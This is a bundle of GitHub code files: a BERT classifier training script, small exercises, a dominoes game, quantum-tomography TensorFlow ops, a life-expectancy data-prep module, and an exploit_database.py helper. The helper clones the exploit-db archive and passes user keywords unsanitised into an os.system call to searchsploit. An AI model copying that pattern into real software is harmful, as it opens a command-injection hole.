ArgumentParser\nfrom tools.loss import LossHP, LossFunc\nfrom tools.train_utils import clear_model, RUN_CONFIG\nfrom dataset.tokenizer import PRETRAIN_CONFIG\nfrom model.mixup import hp_parser as mixup_hp_parser\nfrom model.temporal import hp_parser as temporal_hp_parser\nfrom model.multisource import hp_parser as multisource_hp_parser\nfrom model.adversarial import hp_parser as adversarial_hp_parser\nfrom model.knowledge_distill import hp_parser as knowledge_distill_hp_parser\nfrom model.fgm import hp_parser as fgm_hp_parser\n\n\ndef main():\n parser = ArgumentParser()\n # 确认训练模型和Loss Function\n parser.add_argument(\"--model\", default='bert', type=str)\n parser.add_argument(\"--loss\", default='ce', type=str)\n\n # Semi-Supervised Method\n parser.add_argument('--use_mixup', action='store_true', default=False) # 使用mixup\n parser.add_argument('--use_temporal', action='store_true', default=False) # 使用Temporal\n\n # 领域迁移,领域对抗训练相关\n parser.add_argument('--use_multisource', action='store_true', default=False) # 使用share private multisouce\n parser.add_argument('--use_adversarial', action='store_true', default=False) # 使用share private adversarial\n\n # 对抗训练\n parser.add_argument('--use_fgm', action='store_true', default=False) # 使用FGM\n\n # 模型蒸馏\n parser.add_argument('--knowledge_distill', action='store_true', default=False) # 使用Knowledge Distill进行模型蒸馏\n\n # 导入模型特有HP\n model_name = parser.parse_known_args()[0].model\n model_hp_parser = getattr(importlib.import_module('model.{}.model'.format(model_name)), 'hp_parser')\n parser = model_hp_parser.append(parser)\n\n # 导入Loss特有HP\n loss_name = parser.parse_known_args()[0].loss\n loss_hp_parser = LossHP[loss_name]\n parser = loss_hp_parser.append(parser)\n\n # 导入半监督所需HP\n if parser.parse_known_args()[0].use_mixup:\n parser = mixup_hp_parser.append(parser)\n\n if parser.parse_known_args()[0].use_temporal:\n parser = temporal_hp_parser.append(parser)\n\n # 倒入对抗训练\n if parser.parse_known_args()[0].use_fgm:\n parser = fgm_hp_parser.append(parser)\n\n # 导入领域迁移/对抗相关HP\n if parser.parse_known_args()[0].use_multisource:\n parser = multisource_hp_parser.append(parser)\n\n if parser.parse_known_args()[0].use_adversarial:\n parser = adversarial_hp_parser.append(parser)\n\n # 导入模型蒸馏相关HP\n if parser.parse_known_args()[0].knowledge_distill:\n parser = knowledge_distill_hp_parser.append(parser)\n\n # 所有模型通用HP\n parser.add_argument('--nlp_pretrain_model', default='chinese_L-12_H-768_A-12', type=str)\n\n parser.add_argument(\"--ckpt_dir\", type=str)\n parser.add_argument(\"--data_dir\", type=str) # 数据目录默认包含train/test/valid.txt,如果多输入用,分割\n\n parser.add_argument(\"--max_seq_len\", default=150, type=int) # 文本最大长度\n parser.add_argument(\"--label_size\", default=2, type=int) # 文本最大长度\n parser.add_argument(\"--lr\", default=2e-5, type=float)\n\n parser.add_argument(\"--epoch_size\", default=10, type=int)\n parser.add_argument(\"--batch_size\", default=32, type=int)\n parser.add_argument(\"--early_stop_ratio\", default=1, type=float) # 遍历先x%的Eval就early stop\n\n parser.add_argument(\"--log_steps\", default=100, type=float)\n parser.add_argument(\"--save_steps\", default=1000, type=float)\n\n # GPU\n parser.add_argument(\"--use_gpu\", action='store_true', default=False)\n parser.add_argument(\"--device\", default='0', type=str)\n\n # train/predict/export/predict\n parser.add_argument(\"--clear_model\", action='store_true', default=False)\n parser.add_argument(\"--do_train\", action='store_true', default=False) # 训练\n parser.add_argument(\"--do_eval\", action='store_true', default=False) # 测试集预测 & 评估\n parser.add_argument(\"--do_export\", action='store_true', default=False) # 导出模型\n parser.add_argument(\"--do_predict\", action='store_true', default=False) # 对离线样本进行预测\n\n # 以下文件名常规任务不需要改动,对于增强任务,蒸馏任务需要修改为对应的训练,评估文件\n parser.add_argument('--train_file', default='train', type=str) # 训练文件名,默认指代训练集\n parser.add_argument('--valid_file', default='valid', type=str) # 验证文件名用于early stop,默认指代验证集\n parser.add_argument('--eval_file', default='test', type=str) # 评估文件名,默认指代测试集\n parser.add_argument('--predict_file', default='all', type=str) # 预测文件名,默认指代全样本\n\n # 其他\n parser.add_argument(\"--enable_cache\", action='store_true', default=False) # 使用之前tokenizer cache的特征\n parser.add_argument(\"--clear_cache\", action='store_true', default=False) # 清楚之前tokenizer cache的特征\n parser.add_argument(\"--thresholds\", default='0.6,0.7,0.8,0.9') # 评估F1的阈值\n\n args = parser.parse_args()\n\n CKPT_DIR = './checkpoint'\n EXPORT_DIR = './serving'\n DATA_DIR = './trainsample'\n\n TP = {\n 'model': args.model,\n 'ckpt_name': args.ckpt_dir, # checkpoint 名称,用于指代当前模型版本,和为输出文件命名\n 'ckpt_dir': os.path.join(CKPT_DIR, args.ckpt_dir),\n 'export_dir': os.path.join(EXPORT_DIR, args.ckpt_dir), # 这里导出模型和checkpoint默认保持同名\n # 默认预测文件为eval文件,生成文件名和ckpt相同,在distill中需要制定预测文件\n\n 'train_file': args.train_file,\n 'valid_file': args.valid_file,\n 'eval_file': args.eval_file,\n 'predict_file': args.predict_file,\n\n 'nlp_pretrain_model': args.nlp_pretrain_model,\n 'nlp_pretrain_dir': PRETRAIN_CONFIG[args.nlp_pretrain_model].model_dir,\n 'nlp_pretrain_ckpt': os.path.join(*PRETRAIN_CONFIG[args.nlp_pretrain_model]),\n\n 'max_seq_len': args.max_seq_len,\n 'label_size': args.label_size,\n 'lr': args.lr,\n 'enable_cache': args.enable_cache,\n 'clear_cache': args.clear_cache,\n\n 'epoch_size': args.epoch_size,\n 'batch_size': args.batch_size,\n 'early_stop_ratio': args.early_stop_ratio,\n\n 'log_steps': args.log_steps,\n 'save_steps': args.save_steps,\n 'thresholds': [float(i) for i in args.thresholds.split(',')] # threshold list to evaluate F1/precision/recall\n }\n\n # Update TP\n TP = model_hp_parser.update(TP, args)\n if parser.parse_known_args()[0].use_mixup:\n TP = mixup_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_temporal:\n TP = temporal_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_multisource:\n TP = multisource_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_adversarial:\n TP = adversarial_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].knowledge_distill:\n TP = knowledge_distill_hp_parser.update(TP, args)\n\n if parser.parse_known_args()[0].use_fgm:\n TP = fgm_hp_parser.update(TP, args)\n\n # get loss function\n loss_hp = loss_hp_parser.parse(args)\n TP['loss_func'] = LossFunc[loss_name](**loss_hp)\n\n # 多数据源:得到任务列表和任务数以及label映射\n if args.use_multisource or args.use_adversarial:\n data_list = args.data_dir.split(',')\n TP['data_dir_list'] = [os.path.join(DATA_DIR, i) for i in data_list]\n\n idx2label = {}\n for data_dir in TP['data_dir_list']:\n label2idx = getattr(importlib.import_module('{}.preprocess'.format(data_dir[2:].replace('/', '.'))),\n 'Label2Idx')\n idx2label[data_dir] = dict([(j, i) for i, j in label2idx.items()])\n TP['idx2label'] = idx2label\n else:\n data_dir = os.path.join(DATA_DIR, args.data_dir)\n TP['data_dir'] = data_dir\n TP['data_dir_list'] = [data_dir] # 兼容多任务TP\n label2idx = getattr(importlib.import_module('{}.preprocess'.format(data_dir[2:].replace('/', '.'))),\n 'Label2Idx')\n TP['idx2label'] = {data_dir: dict([(j, i) for i, j in label2idx.items()])} # 兼容多任务\n\n # 删除checkpoint,summary cache\n if args.clear_model:\n clear_model(TP['ckpt_dir'])\n tf.summary.FileWriterCache.clear()\n\n # 如果ckpt为空创建目录\n if not os.path.isdir(TP['ckpt_dir']):\n os.mkdir(TP['ckpt_dir'])\n\n RUN_CONFIG.update({\n 'use_gpu': args.use_gpu,\n 'log_steps': args.log_steps,\n 'save_steps': args.save_steps,\n 'summary_steps': args.save_steps\n })\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.device\n\n if args.use_mixup:\n from model.mixup import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_temporal:\n from model.temporal import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_multisource:\n from model.multisource import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_adversarial:\n from model.adversarial import get_trainer\n trainer = get_trainer(args.model)\n elif args.use_fgm:\n from model.fgm import get_trainer\n trainer = get_trainer(args.model)\n elif args.knowledge_distill:\n from model.knowledge_distill import get_trainer\n trainer = get_trainer(args.model)\n else:\n trainer = getattr(importlib.import_module('model.{}.model'.format(args.model)), 'trainer')\n\n trainer.train(TP, RUN_CONFIG, args.do_train, args.do_eval, args.do_predict, args.do_export)\n\n\nif __name__ == '__main__':\n import os\n\n # set logging level to WARN\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n tf.logging.set_verbosity(tf.logging.WARN)\n main()\n","repo_name":"DSXiangLi/SimpleClassification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9995,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"6537055998","text":"class Solution:\n def arrangeCoins(self, n: int) -> int:\n #Inialize variables to keep track of what we need. \n #Total will be total coins, totalRows is total complete rows, and x is number of coins per row.\n total = 0\n totalRows = 0\n x = 0\n \n while total <= n:\n #Increment increase number of coins per row by one and add it to the total\n x = x+1\n total += x\n #Now we need to say if the total is less than or equal to n we can increments totalRows. \n #If not, we do not have a complete row. \n if total <= n:\n totalRows += 1\n \n #Now we can just return totalRows \n return totalRows\n ","repo_name":"EvanJW7/Leetcode","sub_path":"441. Arranging Coins/arrangingCoins.py","file_name":"arrangingCoins.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908909070","text":"#Thea Sitek, STKTHE002\r\n#18.05.2014\r\n#Histogram over grades\r\n\r\nmarks = input('Enter a space-separated list of marks: \\n')\r\nmarks = marks.split(' ')\r\n\r\ngrades = ['1','2+','2-','3','F']\r\ncounter = [0,0,0,0,0]\r\n\r\n#strings into integers\r\nmarksint = []\r\n#...but with numerical values\r\nfor i in range(len(marks)):\r\n marksint.append(int(marks[i])) \r\n\r\n#delegate marks into grades \r\nfor i in marksint:\r\n if i > 100 or i < 0:\r\n continue\r\n elif i >= 75:\r\n counter[0] += 1\r\n elif i >= 70:\r\n counter[1] += 1\r\n elif i >= 60:\r\n counter[2] += 1 \r\n elif i >= 50:\r\n counter[3] += 1 \r\n else:\r\n counter[4] += 1\r\n \r\nspace = 2 \r\n#format and print\r\nfor i in range(5):\r\n space -= len(grades[i])\r\n print(grades[i], ' '*space, '|', 'X'*counter[i], sep=\"\")\r\n space = 2\r\n \r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/stkthe002/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73854224441","text":"import functools\n\ndef async_redis_method(func):\n\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n try:\n result = await func(*args, **kwargs)\n except Exception as exc:\n raise ConnectionError('Redis have problems') from exc\n return result\n\n return wrapper\n","repo_name":"fluxx1on/AI-server-app","sub_path":"daemon/utils/redis.py","file_name":"redis.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10474704839","text":"import unittest\n\nfrom pyramid import testing\n\nfrom dbas.helper.test import verify_dictionary_of_view\n\n\nclass ReviewOngoingViewTests(unittest.TestCase):\n def setUp(self):\n self.config = testing.setUp()\n self.config.include('pyramid_chameleon')\n\n def tearDown(self):\n testing.tearDown()\n\n def test_page(self):\n from dbas.views import ongoing_history as d\n\n request = testing.DummyRequest()\n self.assertEqual(400, d(request).status_code)\n\n def test_page_logged_in(self):\n from dbas.views import ongoing_history as d\n self.config.testing_securitypolicy(userid='Tobias', permissive=True)\n\n request = testing.DummyRequest()\n response = d(request)\n verify_dictionary_of_view(response)\n\n self.assertIn('history', response)\n self.assertTrue(len(response['history']) != 0)\n","repo_name":"wahello/mirror","sub_path":"dbas/views/tests/test_review_ongoing.py","file_name":"test_review_ongoing.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13152613352","text":"import os\nimport sys\n\nexploit_dir = \"./exploits\"\ngitremote = \"https://github.com/offensive-security/exploit-database.git\"\n\n\n\n####################### DB functions\ndef check_os():\n if os.name == \"posix\":\n return 1\n return 0\n\n\ndef download_db():\n if check_os() == 0:\n print(\"Window not supported yet\")\n return\n print(\"abs path: \", os.path.abspath('.'))\n print(\"making directory\")\n os.system(\"mkdir -p {}\".format(exploit_dir))\n os.system(\"ls {}\".format(exploit_dir))\n\n # parsing\n stream = os.popen(\"git rev-parse --is-inside-work-tree\")\n if stream.read() == \"true\":\n print(\"Empty directory. Good to clone\")\n if os.popen(\"ls\").read() == \"\":\n print(\"Clonning Exploit-db Repository ......\")\n os.system(\"git clone {}\".format(gitremote))\n # ok adding\n stream = os.popen(\"git remote -v\")\n if stream.read() != gitremote:\n print(\"adding remote repo {}\".format(gitremote))\n os.system(\"git init > /dev/null\")\n os.system('git remote add origin \"${}\" 2 > /dev/null '.format(gitremote))\n # Make sure to prep checkout first\n os.system(\"git checkout -- .\")\n # update from git\n os.system(\"git pull origin master\")\n\n print(\"All installed\")\n print(\"install failed\")\n\n\ndef update_db():\n os.system(\"cd {}\".format(exploit_dir))\n\n stream = os.popen(\"git remote -v\")\n if stream.read() != gitremote:\n print(\"adding remote repo {}\".format(gitremote))\n os.system(\"git init > /dev/null\")\n os.system(\"git remote add origin {}\".format(gitremote))\n\n os.system(\"git checkout --\")\n\n os.system(\"git pull origin master\")\n\n print(\"Updated\")\n\ndef search_by_keywords(argv):\n print(\"keywords: \", *argv)\n os.system(\"bash {}/exploit-database/searchsploit \".format(os.path.dirname(os.path.realpath(__file__))) + ' '.join(argv))\n","repo_name":"security-anthem/IoTPene","sub_path":"api/exploit_database.py","file_name":"exploit_database.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"617084317","text":"# Write your code here\nimport random\n\ndomino_set = []\ndummy_domino_set = []\nsave_stock_pieces = []\nstock_pieces = []\ncomputer_pieces = []\nplayer_pieces = []\ndomino_snake = []\nstatus = \"Computer\"\n\nsum_com_piece_list = []\nsum_player_piece_list = []\n\n\ndef generate_domino_set():\n global dummy_domino_set\n for x in range(28):\n domino_set.append([])\n for i in range(2):\n domino_set[x].append(random.randint(0, 6))\n dummy_domino_set = domino_set[:]\n return dummy_domino_set\n\n\ndef generate_stock_pieces():\n global save_stock_pieces\n for x in range(14):\n idx = random.randint(0, len(dummy_domino_set) - 1)\n stock_pieces.append(dummy_domino_set[idx])\n dummy_domino_set.pop(idx)\n save_stock_pieces = stock_pieces[:]\n return stock_pieces\n\n\ndef generate_computer_pieces():\n for x in range(7):\n idx = random.randint(0, len(dummy_domino_set) - 1)\n computer_pieces.append(dummy_domino_set[idx])\n dummy_domino_set.pop(idx)\n return computer_pieces\n\n\ndef generate_player_pieces():\n global player_pieces\n player_pieces = dummy_domino_set[:]\n return player_pieces\n\n\ndef reshuffle_domino_set():\n global dummy_domino_set\n random.shuffle(domino_set)\n dummy_domino_set = domino_set[:]\n generate_stock_pieces()\n generate_computer_pieces()\n generate_player_pieces()\n\n\ndef find_domino_snake():\n generate_domino_set()\n generate_stock_pieces()\n generate_computer_pieces()\n generate_player_pieces()\n while True:\n global status\n global sum_com_piece_list\n global sum_player_piece_list\n for x in range(7):\n sum_com_piece_list.append(sum(computer_pieces[x]))\n sum_player_piece_list.append(sum(player_pieces[x]))\n max_com_piece = max(sum_com_piece_list)\n max_player_piece = max(sum_player_piece_list)\n\n if max_com_piece != max_player_piece:\n break\n else:\n # generate_domino_set()\n stock_pieces.clear()\n computer_pieces.clear()\n player_pieces.clear()\n sum_player_piece_list.clear()\n sum_com_piece_list.clear()\n reshuffle_domino_set()\n\n if max_com_piece > max_player_piece:\n status = \"player\"\n idx = sum_com_piece_list.index(max_com_piece)\n domino_snake.append(computer_pieces[idx])\n computer_pieces.pop(idx)\n else:\n status = \"computer\"\n idx = sum_player_piece_list.index(max_player_piece)\n domino_snake.append(player_pieces[idx])\n player_pieces.pop(idx)\n\n print(\"Stock pieces: {}\".format(save_stock_pieces))\n print(\"computer pieces: {}\".format(computer_pieces))\n print(\"player pieces: {}\".format(player_pieces))\n print(\"domino snake: {}\".format(domino_snake))\n print(\"status: {}\".format(status))\n\n\n# if __name__ == \"__main__\":\nfind_domino_snake()\n","repo_name":"okornoe/Dominoes","sub_path":"Dominoes/task/dominoes/dominoes.py","file_name":"dominoes.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44148211070","text":"\"\"\"\nUtility function and operations\n\"\"\"\nimport numpy as np\n\n\nfrom qutip import Qobj\n\nimport tensorflow as tf\n\n\ndef batched_expect(ops, rhos):\n \"\"\"\n Calculates expectation values for a batch of density matrices\n for a set of operators.\n\n Args:\n ops (`tf.Tensor`): a tensor of shape (batch_size, N, hilbert_size,\n hilbert_size) \n of N measurement operators.\n rhos (`tf.Tensor`): a tensor (batch_size, hilbert_size, hilbert_size).\n\n Returns:\n expectations (:class:`tf.Tensor`): A tensor shaped as (batch_size, N)\n representing expectation values for\n the N operators for all the density\n matrices (batch_size).\n \"\"\"\n products = tf.einsum(\"bnij, bjk->bnik\", ops, rhos)\n traces = tf.linalg.trace(products)\n expectations = tf.math.real(traces)\n return expectations\n\n\ndef random_alpha(radius, inner_radius=0):\n \"\"\"\n Generates random complex numbers within a circle.\n\n Args:\n radius (float): Radius for the values\n inner_radius (float): Inner radius which defaults to 0.\n \"\"\"\n radius = np.random.uniform(inner_radius, radius)\n phi = np.random.uniform(-np.pi, np.pi)\n return radius * np.exp(1j * phi)\n\n\ndef dm_to_tf(rhos):\n \"\"\"\n Convert a list of qutip density matrices to TensorFlow\n density matrices\n\n Args:\n rhos (list of `qutip.Qobj`): List of N qutip density matrices\n\n Returns:\n tf_dms (:class:`tf.Tensor`): A tensor of shape (N, hilbert_size,\n hilbert_size)\n of N density matrices.\n \"\"\"\n tf_dms = tf.convert_to_tensor(\n [tf.complex(rho.full().real, rho.full().imag) for rho in rhos]\n )\n return tf_dms\n\n\ndef tf_to_dm(rhos):\n \"\"\"\n Convert a tensorflow density matrix to qutip density matrix\n\n Args:\n rhos (`tf.Tensor`): a tensor of shape (N, hilbert_size, hilbert_size)\n representing N density matrices.\n\n Returns:\n rho_gen (list of :class:`qutip.Qobj`): A list of N density matrices.\n\n \"\"\"\n rho_gen = [Qobj(rho.numpy()) for rho in rhos]\n return rho_gen\n\n\ndef clean_cholesky(img):\n \"\"\"\n Cleans an input matrix to make it the Cholesky decomposition matrix T\n\n Args:\n img (`tf.Tensor`): a tensor of shape (batch_size, hilbert_size,\n hilbert_size, 2)\n representing random outputs from a neural netowrk.\n The last dimension is for separating the real and\n imaginary part.\n\n Returns:\n T (`tf.Tensor`): a 3D tensor (N, hilbert_size, hilbert_size)\n representing N matrices used for Cholesky decomp.\n \"\"\"\n real = img[:, :, :, 0]\n imag = img[:, :, :, 1]\n\n diag_all = tf.linalg.diag_part(imag, k=0, padding_value=0)\n diags = tf.linalg.diag(diag_all)\n\n imag = imag - diags\n imag = tf.linalg.band_part(imag, -1, 0)\n real = tf.linalg.band_part(real, -1, 0)\n T = tf.complex(real, imag)\n return T\n\n\ndef density_matrix_from_T(tmatrix):\n \"\"\"\n Gets density matrices from T matrices and normalizes them.\n\n Args:\n tmatrix (`tf.Tensor`): A tensor (N, hilbert_size, hilbert_size)\n representing N valid T matrices.\n\n Returns:\n rho (`tf.Tensor`): A tensor of shape (N, hilbert_size, hilbert_size)\n representing N density matrices.\n \"\"\"\n T = tmatrix\n T_dagger = tf.transpose(T, perm=[0, 2, 1], conjugate=True)\n proper_dm = tf.matmul(T_dagger, T)\n all_traces = tf.linalg.trace(proper_dm)\n all_traces = tf.reshape(1 / all_traces, (-1, 1))\n rho = tf.einsum(\"bij,bk->bij\", proper_dm, all_traces)\n\n return rho\n\n\ndef convert_to_real_ops(ops):\n \"\"\"\n Converts a batch of TensorFlow operators to something that a neural network\n can take as input.\n\n Args:\n ops (`tf.Tensor`): a 4D tensor (batch_size, N, hilbert_size,\n hilbert_size)\n of N measurement operators.\n\n Returns:\n tf_ops (`tf.Tensor`): a 4D tensor (batch_size, hilbert_size,\n hilbert_size, 2*N)\n of N measurement operators converted into real\n matrices.\n \"\"\"\n tf_ops = tf.transpose(ops, perm=[0, 2, 3, 1])\n tf_ops = tf.concat([tf.math.real(tf_ops), tf.math.imag(tf_ops)], axis=-1)\n return tf_ops\n\n\ndef convert_to_complex_ops(ops):\n \"\"\"\n Converts a batch of TensorFlow operators to something that a neural network\n can take as input.\n\n Args:\n ops (`tf.Tensor`): a 4D tensor (batch_size, N, hilbert_size,\n hilbert_size)\n of N measurement operators.\n\n Returns:\n tf_ops (`tf.Tensor`): a 4D tensor (batch_size, hilbert_size,\n hilbert_size, 2*N)\n of N measurement operators converted into real\n matrices.\n \"\"\"\n shape = ops.shape\n num_points = shape[-1]\n tf_ops = tf.complex(\n ops[..., : int(num_points / 2)], ops[..., int(num_points / 2) :]\n )\n tf_ops = tf.transpose(tf_ops, perm=[0, 3, 1, 2])\n return tf_ops\n\n\ndef tf_fidelity(A, B):\n \"\"\"Calculates the fidelity between tensors A and B.\n\n Args:\n A, B (tf.Tensor): List of tensors (hilbert_size, hilbert_size).\n\n Returns:\n float: Fidelity between A and B\n \"\"\"\n sqrtmA = tf.matrix_square_root(A)\n temp = tf.matmul(sqrtmA, B)\n temp2 = tf.matmul(temp, sqrtmA)\n fidel = tf.linalg.trace(tf.linalg.sqrtm(temp2)) ** 2\n return tf.math.real(fidel)\n","repo_name":"quantshah/qst-cgan","sub_path":"qst_cgan/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"71730931001","text":"n=5\nstages=[2,1,2,6,2,4,3,3]\n\ndef solution(N,stages):\n answer=[]\n yet=0\n su=len(stages)\n for i in range(1,N+1):\n su-=yet\n yet=stages.count(i)\n if su==0:\n answer.append((0,i))\n else:\n answer.append((yet/su,i))\n answer.sort(key=lambda x:(-x[0],x[1]))\n\n answer=[i[1] for i in answer]\n return answer\nprint(solution(n,stages))\n","repo_name":"Yoo-sumi/CodingTest","sub_path":"Sort_Problem/Q25.py","file_name":"Q25.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30361067836","text":"#likes\r\ndef likes(names):\r\n if len(names) == 0:\r\n return('no one likes this')\r\n \r\n elif len(names) == 1:\r\n names.append('likes this')\r\n return ' '.join(names)\r\n \r\n elif 1 < len(names) <= 2:\r\n s1 = names[0]\r\n s2 = names[1]\r\n s3 = s1,'and', s2,'like this'\r\n return ' '.join(s3)\r\n \r\n elif len(names) == 3:\r\n s1 = names[0]+\",\"\r\n s2 = names[1]\r\n s3 = names[2]\r\n s4 = s1, s2, 'and', s3, 'like this'\r\n \r\n return ' '.join(s4)\r\n \r\n elif len(names) > 3:\r\n s1 = names[0]+\",\"\r\n s2 = names[1]\r\n s3 = len(names)-2\r\n s3 = str(s3)\r\n s4 = s1, s2, 'and', s3, 'others like this'\r\n \r\n return ' '.join(s4)\r\n pass\r\n","repo_name":"hanifz123/Algorithms","sub_path":"function_likes.py","file_name":"function_likes.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6821908257","text":"######################### IMPORTS #########################\n\n# Import standard libraries\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport pandas as pd\nfrom scipy import stats\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport matplotlib.pyplot as plt\n\n# Decision Tree and Model Evaluation Imports\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.feature_selection import RFE\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.tree import plot_tree, export_text\n\n# import sklearn.linear_model\nfrom sklearn.linear_model import LassoLars\nfrom sklearn.linear_model import TweedieRegressor\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import LinearRegression, Lasso, Ridge, ElasticNet\nfrom sklearn.linear_model import LassoCV, RidgeCV, ElasticNetCV\n\n# import sklearn.metrics\nfrom sklearn.metrics import ConfusionMatrixDisplay\nfrom sklearn.metrics import confusion_matrix \nfrom sklearn.metrics import plot_confusion_matrix \nfrom sklearn.metrics import classification_report \nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# import sklearn.preprocessing\nimport sklearn.preprocessing\nfrom sklearn.preprocessing import MinMaxScaler \nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.preprocessing import QuantileTransformer\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# Set local state\nα = Alpha = alpha = 0.05\nrandom_state=1992\nnp.random.seed(1992)\n\n# Hides future deprecation warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\") \n\n######################### ACQUIRE DATA #########################\n\ndef get_leam():\n \"\"\"\n This function pulls in the CSV as a DataFrame\n \n Due to latency and timeout issues, the CSV Data Pull weblink above must be used to pull the CSV directly.\n The csv should be saved to a local file. Multiple refresh attempts may be required before getting the save file prompt.\n \n GHO Selections: https://apps.who.int/gho/athena/api/GHO\n Homepage: https://www.who.int/data/gho/info/athena-api-examples\n CSV Data Pull: https://apps.who.int/gho/athena/api/GHO/WHOSIS_000001,WHOSIS_000002,WHOSIS_000007,WHOSIS_000015?format=csv\n \"\"\"\n \n df = pd.read_csv('leam.csv')\n\n return df\n\n######################### PREPARE DATA #########################\n\ndef clean_leam(df):\n\n \"\"\"\n This function is used to clean the Life Expectancy And Mortaloty (LEAM) data as needed \n ensuring not to introduce any new data but only remove irrelevant data \n or reshape existing data to useable formats.\n \"\"\"\n \n # Drop all columns with more than 10k Null and uneeded features\n df = df.drop(columns=['Low',\n 'High',\n 'StdErr', \n 'StdDev', \n 'Comments', \n 'WORLDBANKINCOMEGROUP'\n ])\n \n # IMPUTE NaN for [COUNTRY] with 'GLOBAL' if [REGION] == 'GLOBAL'\n missing_mask = df['COUNTRY'].isna()\n mapping_dict = dict({'GLOBAL': 'GLOBAL'})\n df.loc[missing_mask, 'COUNTRY'] = df.loc[missing_mask, 'REGION'].map(mapping_dict)\n \n df = df.dropna()\n \n # Create pivot table\n leam_pivot = df.pivot_table(index=['YEAR','COUNTRY','SEX'], columns='GHO', values='Numeric')\n \n # assign pivot to df and reset index\n df = leam_pivot.reset_index()\n \n # Create life_expectancy feature consisting of the mean of individual life expectancy features\n df['life_expectancy'] = df[['WHOSIS_000001','WHOSIS_000002','WHOSIS_000007','WHOSIS_000015']].mean(axis=1)\n \n # Use pandas dummies to pivot features with more than two string values\n # into multiple columns with binary int values that can be read as boolean\n dummy_df = pd.get_dummies(data=df[['SEX']], drop_first=False)\n\n # Concat to leam DataFrame\n df = pd.concat([df, dummy_df], axis=1)\n \n # DROP original row for redundancy\n df = df.drop(columns=['SEX'])\n \n # Cache a Clean version of my data\n df.to_csv('clean_leam.csv')\n \n return df\n\n \n\n######################### SPLIT DATA #########################\n\ndef split(df, stratify=False, target=None):\n \"\"\"\n This Function splits the DataFrame into train, validate, and test\n then prints a graphic representation and a mini report showing the shape of the original DataFrame\n compared to the shape of the train, validate, and test DataFrames.\n \n IMPORTS Required:\n from sklearn.model_selection import train_test_split\n \n ARGUMENTS:\n df - Input the DataFrame you will split\n stratify - True will stratify for your Target (Do NOT stratify on continuous data)\n False will ignore this function\n target - Only needed if you will stratify\n \"\"\"\n \n # Do NOT stratify on continuous data\n if stratify:\n # Split df into train and test using sklearn\n train, test = train_test_split(df, test_size=.2, random_state=1992, stratify=df[target])\n # Split train_df into train and validate using sklearn\n train, validate = train_test_split(train, test_size=.25, random_state=1992, stratify=df[target])\n \n else:\n train, test = train_test_split(df, test_size=.2, random_state=1992)\n train, validate = train_test_split(train, test_size=.37, random_state=1992)\n \n # reset index for train validate and test\n train.reset_index(drop=True, inplace=True)\n validate.reset_index(drop=True, inplace=True)\n test.reset_index(drop=True, inplace=True)\n\n train_prcnt = round((train.shape[0] / df.shape[0]), 2)*100\n validate_prcnt = round((validate.shape[0] / df.shape[0]), 2)*100\n test_prcnt = round((test.shape[0] / df.shape[0]), 2)*100\n \n print('________________________________________________________________')\n print('| DF |')\n print('|--------------------:--------------------:--------------------|')\n print('| Train | Validate | Test |')\n print(':--------------------------------------------------------------:')\n print()\n print()\n print(f'Prepared df: {df.shape}')\n print()\n print(f' Train: {train.shape} - {train_prcnt}%')\n print(f' Validate: {validate.shape} - {validate_prcnt}%')\n print(f' Test: {test.shape} - {test_prcnt}%')\n \n \n return train, validate, test\n\ndef viz_split(train, validate, test):\n plt.figure(figsize=(12, 4))\n plt.title('Distribution of train, validate, and test')\n plt.plot(train.index, train.life_expectancy, color='lightgreen')\n plt.plot(validate.index, validate.life_expectancy, color='goldenrod')\n plt.plot(test.index, test.life_expectancy, color='blue', alpha=.5)\n plt.legend(['train', 'validate', 'test'], fontsize=15)\n \n return plt.show()\n\ndef Xy_split(feature_cols, target, train, validate, test):\n \"\"\"\n This function will split the train, validate, and test data by the Feature Columns selected and the Target.\n \n Imports 